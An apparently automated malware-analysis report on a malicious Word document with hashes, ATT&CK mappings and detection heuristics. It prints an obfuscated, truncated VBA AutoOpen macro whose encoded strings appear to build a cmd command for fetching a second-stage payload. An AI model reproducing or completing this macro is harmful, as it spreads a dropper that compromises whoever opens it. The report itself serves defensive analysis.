Office (OLE) malware analysis — malicious · 546b6090c06247ae

MALICIOUS

Office (OLE)

134.4 KB Created: 2018-09-27 11:26:00 Authoring application: Microsoft Office Word First seen: 2019-01-12

MD5: 44317521a4e0a7bab411da9058d68e54 SHA-1: c8180a903b98cec19bc9ce413a38eb59314f0632 SHA-256: 546b6090c06247aedd6adab36a4cfc86b4c179b4bf91b586fd79a7c9ba9320ab

202 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro utilizes the Shell() function, a critical heuristic, indicating an attempt to execute arbitrary commands. The presence of a legacy WordBasic auto-exec marker and the ClamAV detection further support its malicious nature. The macro's obfuscated code and truncated nature prevent a full analysis of its payload, but the intent is clearly to download and execute a second-stage payload.

Heuristics 6

ClamAV: Doc.Malware.00536d-6699271-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.00536d-6699271-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 87082 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	87082 bytes
SHA-256: `f64e5610d74bf17569acd0122ed5526d73c18cf145fe0051904284344744593a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "wstfmJw" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() Dim LkaHhw(2) LkaHhw(0) = InStrRev(wvOdHGRR + sdzBGpZsCDFZbqSccHJzbL + GoqFFTVB, JdkhBGCr + nmMKwpYifXqSrCwwmEZ + moruF) + Left(kSuHUbjG + zTcVSqPJDFtGEKXKzS + knYwmwP, 426) + InStrRev(fHFGjUB + vzqqLctQIwSoihtqEQuhP + KIziDIz, jtwNTt + NtPrcSOwLwOBRafkSmFoV + HwkjW) + InStrRev(vUWvkiq + dwAYUOTiBIPMIqTKQNupl + zEjzk, FcrUcnt + CUCSiMCuOfTSPrORO + ROjGjOY) LkaHhw(1) = InStrRev(RltsUjO + nhEWOPnjFkZbQlXlbfCdjiO + rnfdqj, avAQT + SdGpUIVwdwFlDzhOCvaHj + kwImUIsX) + Right(bYNQW + zubpzBHiFkjsuiXYHJ + MNtVMaUz, 617) + Right(HoUAnvBl + IoShDiszQZrGDjuaOIE + Oiaik, 561) + InStr(XlEZao + mFiHRQiFjOGLXuRSVEDIU + TUKCc, ibCWFjw + GAOzMAAzJWnrizPwNuVGWT + rhWiUUjz) Dim FLWsC(1) FLWsC(0) = InStrRev(JjHAiklG + inkAXoCiPRjLJYiJPXPtEp + AUhPWt, iNEiXUJ + ZdVzbQCzCNPtjKBOzAun + qDqzlv) + InStrRev(XiMnXZEr + qcUohtDSvZUiXkMzD + zXWBw, cJFoUwsF + zihcTRzVmzoINidwRju + qlTjK) + Left(SiqBY + jFTBcowRNjHOPIklalhz + cihGBqkj, 55) + InStrRev(zfRFKCTG + isJzBnDtwHzLAhQXwYL + mJkfPj, VnzmYIzq + JziATRwUDjEiTarOHoKlQbY + qYRjzt) Dim tFOPFu(1) tFOPFu(0) = InStr(jnRtVXrV + UuFWVcKvRilwfHRiIzvf + XRJsX, nGidXXkm + wVRvrmIiaqmjYOzKAWX + zpAHPkjs) + InStrRev(wKtPj + JHuBBFPcLmcbYiwBl + jtwjZc, wRizN + lwQurYtPzoVliuzpbA + AdLbOV) toiMFARcmp (KeyString(pTdKE + zmtFII + 0 + 12 + 55 + nakur + FzTabBS) + qHlZdjk + AUvBlYOO + KeyString(JNMOfLO + drUhdIPA + 0 + 13 + 64 + XDpTGrKj + vMMjkw) + HNktI + ZoHKJwVSDkI + zblWNHa + vtjsdluD + UJjwQNf + HiPaDGvjb + isfjRWMQ + mqTjUOK + JiMjwI) Dim rzMSYv(2) rzMSYv(0) = Right(EwmDFk + IYBvYvbIKPYaIDJC + QNuEJ, 307) + InStrRev(EMYNGX + hRXDlOjqOuzviNzsK + ODdDDzqK, zCWsiAW + OOvVvvFRAIfPAqDTGQpfKHW + CDNbmKr) rzMSYv(1) = Left(hiIzjB + HjCjpLaoiZjkOZUdmhsFIPk + aJknUOzm, 476) + Left(smmncS + TInURPYPitQFZqwlOVO + jBszvFcp, 453) End Sub Attribute VB_Name = "imoSXwAkH" Function HNktI() rqijNCoYlh = "d / / \ \\ \ \" + "/ /V:O/C" + """" + "set ]" + "@'=702a 2a07 0" + "27a 02a7 2" nnTqK = "70a 702a 0a27" + " 07a2 72a0" + " 7a20 a072 " + "72a0 a702 0a27 a207 " + "0a27 72a0 2" + "a70}2a70}a" Dim lpiKD(1) lpiKD(0) = Right(jlPsq + JOBrHQDwGnvdnvaKszS + jSisS, 487) + InStr(zTXhrFjC + nbXIVOvURjMvrIplKjcYo + QCcpu, KiBfawQ + FPTnYzszrQwGjMMzs + XZdkMjS) Dim lPwIKK(1) lPwIKK(0) = InStrRev(cmopnNaY + oSALTiTLvUOzYciDzXLq + slCLUbi, jbhhV + LZjdOPMFUXVJXNkawRzJ + UmsBAMi) + InStr(LlKJMDWp + DNkmDTzuVtLQLCWLEHokV + REXWabtI, jApBjP + uzUwSRziCsOZLiPZX + SIvTKB) + Left(XsBWa + SmGVawPBvVbiTRTdjMDw + SUizNGoM, 782) + InStr(TCUUast + aDqFDlDzKPnwVIboohOpD + NwIGTK, ZPiYwb + jiApUjMscFiILNjYEoZq + jwszn) Dim VNfXIU(2) VNfXIU(0) = Right(kFjrDqk + zwOkSEastKnZPwvkb + ODaMnFmU, 662) + Right(tlVTHCJ + QawwRrJcvAdjDKGQFn + RHZcE, 930) VNfXIU(1) = Left(aGpinFcu + KQnsDMinzwsOJjrrPFf + ZWqYv, 93) + InStrRev(VJcGY + NuQnthsjlXYlCiDlSjWJr + kXEjmr, iVpsUEri + XjwIqTwDGXrkZjdnzzjR + KAmihb) jfYkr = "720{0a72ha" + "027c0a72t7a02a027aca" + "072}702a;270ak20" + "7aa270ae0a2" ckpGlnMfTc = "7r7a20b702a;a027H2" + "70aj2a07Oa027$20a7 " + "70a2m2a07e27" + "a0ta027I27a0-207aea" + "027k27a0o270av0a2" sbLMHawZSQ = "7n270aI207" + "a;27a0)70a2Ha720" + "j2a70O7a02$" + "7a02 20a7,072ar7" HNktI = rqijNCoYlh + nnTqK + jfYkr + ckpGlnMfTc + sbLMHawZSQ Dim jtDbwo(2) jtDbwo(0) = InStrRev(afLhq + LLMFrkokjjkcsrObFBSoB + FHCRjv, TRpjChz + sMDAJtTTOQEsXUpdmTAo + YPGIM) + InStrRev(wzwpX + NSzPjXVaiFhsVSAswkddK + KItbVG, PUVkIZjw + DiBkdzEQXLjpnMNjSI + wFwfHPh) + InStrRev(IBHdSZi + EpaijibvMSRCTCifUwBjE + nfftnjm, IJQZT + TUAUFiCPuzaaCGErBwB + iGOvkmF) + Left(QiOEEV + wisjMVCmGUcvvQpwTG + pnDJUsS, 103) jtDbwo(1) = InStrRev(YzXjzRl + wfkjbhQTOXmWwBDwhKUBl + kuORXN, zzEDcc + iqMwBAdCIZijzsEwVEW + fJwDw) + InStr(jdlqKZs + YlOPnciTFLXfiACTsB + JbpAznT, jNzTH + CickthEvRhKchFHEo + jjAfLoS) Dim TYTbh(1) TYTbh(0) = Left(iEAPnlP ... (truncated)

SHA-256: f64e5610d74bf17569acd0122ed5526d73c18cf145fe0051904284344744593a

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "wstfmJw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim LkaHhw(2)
LkaHhw(0) = InStrRev(wvOdHGRR + sdzBGpZsCDFZbqSccHJzbL + GoqFFTVB, JdkhBGCr + nmMKwpYifXqSrCwwmEZ + moruF) + Left(kSuHUbjG + zTcVSqPJDFtGEKXKzS + knYwmwP, 426) + InStrRev(fHFGjUB + vzqqLctQIwSoihtqEQuhP + KIziDIz, jtwNTt + NtPrcSOwLwOBRafkSmFoV + HwkjW) + InStrRev(vUWvkiq + dwAYUOTiBIPMIqTKQNupl + zEjzk, FcrUcnt + CUCSiMCuOfTSPrORO + ROjGjOY)
LkaHhw(1) = InStrRev(RltsUjO + nhEWOPnjFkZbQlXlbfCdjiO + rnfdqj, avAQT + SdGpUIVwdwFlDzhOCvaHj + kwImUIsX) + Right(bYNQW + zubpzBHiFkjsuiXYHJ + MNtVMaUz, 617) + Right(HoUAnvBl + IoShDiszQZrGDjuaOIE + Oiaik, 561) + InStr(XlEZao + mFiHRQiFjOGLXuRSVEDIU + TUKCc, ibCWFjw + GAOzMAAzJWnrizPwNuVGWT + rhWiUUjz)
   Dim FLWsC(1)
FLWsC(0) = InStrRev(JjHAiklG + inkAXoCiPRjLJYiJPXPtEp + AUhPWt, iNEiXUJ + ZdVzbQCzCNPtjKBOzAun + qDqzlv) + InStrRev(XiMnXZEr + qcUohtDSvZUiXkMzD + zXWBw, cJFoUwsF + zihcTRzVmzoINidwRju + qlTjK) + Left(SiqBY + jFTBcowRNjHOPIklalhz + cihGBqkj, 55) + InStrRev(zfRFKCTG + isJzBnDtwHzLAhQXwYL + mJkfPj, VnzmYIzq + JziATRwUDjEiTarOHoKlQbY + qYRjzt)
   Dim tFOPFu(1)
tFOPFu(0) = InStr(jnRtVXrV + UuFWVcKvRilwfHRiIzvf + XRJsX, nGidXXkm + wVRvrmIiaqmjYOzKAWX + zpAHPkjs) + InStrRev(wKtPj + JHuBBFPcLmcbYiwBl + jtwjZc, wRizN + lwQurYtPzoVliuzpbA + AdLbOV)
toiMFARcmp (KeyString(pTdKE + zmtFII + 0 + 12 + 55 + nakur + FzTabBS) + qHlZdjk + AUvBlYOO + KeyString(JNMOfLO + drUhdIPA + 0 + 13 + 64 + XDpTGrKj + vMMjkw) + HNktI + ZoHKJwVSDkI + zblWNHa + vtjsdluD + UJjwQNf + HiPaDGvjb + isfjRWMQ + mqTjUOK + JiMjwI)
   Dim rzMSYv(2)
rzMSYv(0) = Right(EwmDFk + IYBvYvbIKPYaIDJC + QNuEJ, 307) + InStrRev(EMYNGX + hRXDlOjqOuzviNzsK + ODdDDzqK, zCWsiAW + OOvVvvFRAIfPAqDTGQpfKHW + CDNbmKr)
rzMSYv(1) = Left(hiIzjB + HjCjpLaoiZjkOZUdmhsFIPk + aJknUOzm, 476) + Left(smmncS + TInURPYPitQFZqwlOVO + jBszvFcp, 453)
End Sub


Attribute VB_Name = "imoSXwAkH"
Function HNktI()
rqijNCoYlh = "d   / /  \  \\  \ \" + "/ /V:O/C" + """" + "set ]" + "@'=702a 2a07 0" + "27a 02a7 2"
nnTqK = "70a 702a 0a27" + " 07a2 72a0" + " 7a20 a072 " + "72a0 a702 0a27 a207 " + "0a27 72a0 2" + "a70}2a70}a"
Dim lpiKD(1)
lpiKD(0) = Right(jlPsq + JOBrHQDwGnvdnvaKszS + jSisS, 487) + InStr(zTXhrFjC + nbXIVOvURjMvrIplKjcYo + QCcpu, KiBfawQ + FPTnYzszrQwGjMMzs + XZdkMjS)
   Dim lPwIKK(1)
lPwIKK(0) = InStrRev(cmopnNaY + oSALTiTLvUOzYciDzXLq + slCLUbi, jbhhV + LZjdOPMFUXVJXNkawRzJ + UmsBAMi) + InStr(LlKJMDWp + DNkmDTzuVtLQLCWLEHokV + REXWabtI, jApBjP + uzUwSRziCsOZLiPZX + SIvTKB) + Left(XsBWa + SmGVawPBvVbiTRTdjMDw + SUizNGoM, 782) + InStr(TCUUast + aDqFDlDzKPnwVIboohOpD + NwIGTK, ZPiYwb + jiApUjMscFiILNjYEoZq + jwszn)
   Dim VNfXIU(2)
VNfXIU(0) = Right(kFjrDqk + zwOkSEastKnZPwvkb + ODaMnFmU, 662) + Right(tlVTHCJ + QawwRrJcvAdjDKGQFn + RHZcE, 930)
VNfXIU(1) = Left(aGpinFcu + KQnsDMinzwsOJjrrPFf + ZWqYv, 93) + InStrRev(VJcGY + NuQnthsjlXYlCiDlSjWJr + kXEjmr, iVpsUEri + XjwIqTwDGXrkZjdnzzjR + KAmihb)
jfYkr = "720{0a72ha" + "027c0a72t7a02a027aca" + "072}702a;270ak20" + "7aa270ae0a2"
ckpGlnMfTc = "7r7a20b702a;a027H2" + "70aj2a07Oa027$20a7 " + "70a2m2a07e27" + "a0ta027I27a0-207aea" + "027k27a0o270av0a2"
sbLMHawZSQ = "7n270aI207" + "a;27a0)70a2Ha720" + "j2a70O7a02$" + "7a02 20a7,072ar7"
HNktI = rqijNCoYlh + nnTqK + jfYkr + ckpGlnMfTc + sbLMHawZSQ
   Dim jtDbwo(2)
jtDbwo(0) = InStrRev(afLhq + LLMFrkokjjkcsrObFBSoB + FHCRjv, TRpjChz + sMDAJtTTOQEsXUpdmTAo + YPGIM) + InStrRev(wzwpX + NSzPjXVaiFhsVSAswkddK + KItbVG, PUVkIZjw + DiBkdzEQXLjpnMNjSI + wFwfHPh) + InStrRev(IBHdSZi + EpaijibvMSRCTCifUwBjE + nfftnjm, IJQZT + TUAUFiCPuzaaCGErBwB + iGOvkmF) + Left(QiOEEV + wisjMVCmGUcvvQpwTG + pnDJUsS, 103)
jtDbwo(1) = InStrRev(YzXjzRl + wfkjbhQTOXmWwBDwhKUBl + kuORXN, zzEDcc + iqMwBAdCIZijzsEwVEW + fJwDw) + InStr(jdlqKZs + YlOPnciTFLXfiACTsB + JbpAznT, jNzTH + CickthEvRhKchFHEo + jjAfLoS)
   Dim TYTbh(1)
TYTbh(0) = Left(iEAPnlP
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.